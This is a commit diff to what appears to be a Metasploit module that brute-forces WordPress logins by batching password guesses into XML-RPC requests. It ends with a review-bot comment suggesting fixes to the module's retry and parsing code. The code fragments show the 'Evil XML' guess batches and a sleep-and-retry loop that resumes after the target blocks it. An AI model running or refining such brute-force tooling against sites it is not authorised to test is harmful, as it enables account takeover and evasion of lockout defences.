Add wordpress masive bruteforce using XMLRPC (wordpress API)
parent
d498dc46a1
commit
b571a79b69
|
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
|
print_warning('Generating XMLs may take a while depends on the list file(s) size.') if passwords.size > 1500
|
||||||
xml_payloads = [] # Container for all generated XMLs
|
xml_payloads = [] # Container for all generated XMLs
|
||||||
xml = ""
|
xml = ''
|
||||||
# Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
|
# Evil XML | Limit number of log-ins to 1500/request for wordpress limitation
|
||||||
passwords.each_slice(1500) do |pass_group|
|
passwords.each_slice(1500) do |pass_group|
|
||||||
|
|
||||||
|
@ -113,9 +113,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def parse_response(res)
|
def parse_response(res)
|
||||||
|
|
||||||
resp.scan(/Incorrect username or password/)
|
resp.scan(/Incorrect username or password/)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
|
@ -143,10 +141,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
# Request Parser
|
# Request Parser
|
||||||
req_xml = Nokogiri::Slop xml
|
req_xml = Nokogiri::Slop xml
|
||||||
# Request length
|
|
||||||
# total_req = req_xml.document.methodCall.params.param.value.array.data.value.size
|
|
||||||
# print_status("Totla number of combinations: #{total_req}")
|
|
||||||
|
|
||||||
# Response Parser
|
# Response Parser
|
||||||
res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
|
res_xml = Nokogiri::Slop response.to_s.scan(/<.*>/).join
|
||||||
|
|
||||||
|
@ -164,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end end
|
end end
|
||||||
rescue NoMethodError
|
rescue NoMethodError
|
||||||
print_error("It seems you got blocked!")
|
print_error("It seems you got blocked!")
|
||||||
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
|
print_warning("I'll sleep for 6 minutes then I'll try again. CTR+C to exit")
|
||||||
sleep 6 * 60
|
sleep 6 * 60
|
||||||
retry
|
retry
|
||||||
# return :abort
|
# return :abort
|
||||||
|
|
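Review bot: The `rescue NoMethodError` / `sleep 6 * 60` / `retry` sequence in the last hunk retries with no upper bound and treats every NoMethodError as "you got blocked". Since the response is parsed with `Nokogiri::Slop`, any reply whose shape differs from the expected one (an error page, an empty body) would presumably raise the same exception, so a parsing bug or a dead endpoint puts the module into an endless six-minute loop against the target. Bound the retry and surface the real cause: keep a counter initialised before the `begin` (which starts outside the hunk) and use something like `retry if (attempts += 1) < 3`, otherwise `print_error` the exception message and return, as the commented-out `# return :abort` seems to have intended. Separately, `parse_response(res)` reads `resp`, which is not its parameter; unless `resp` is defined elsewhere in the class this raises NameError, which the `rescue NoMethodError` would not catch, so the body should probably use `res`.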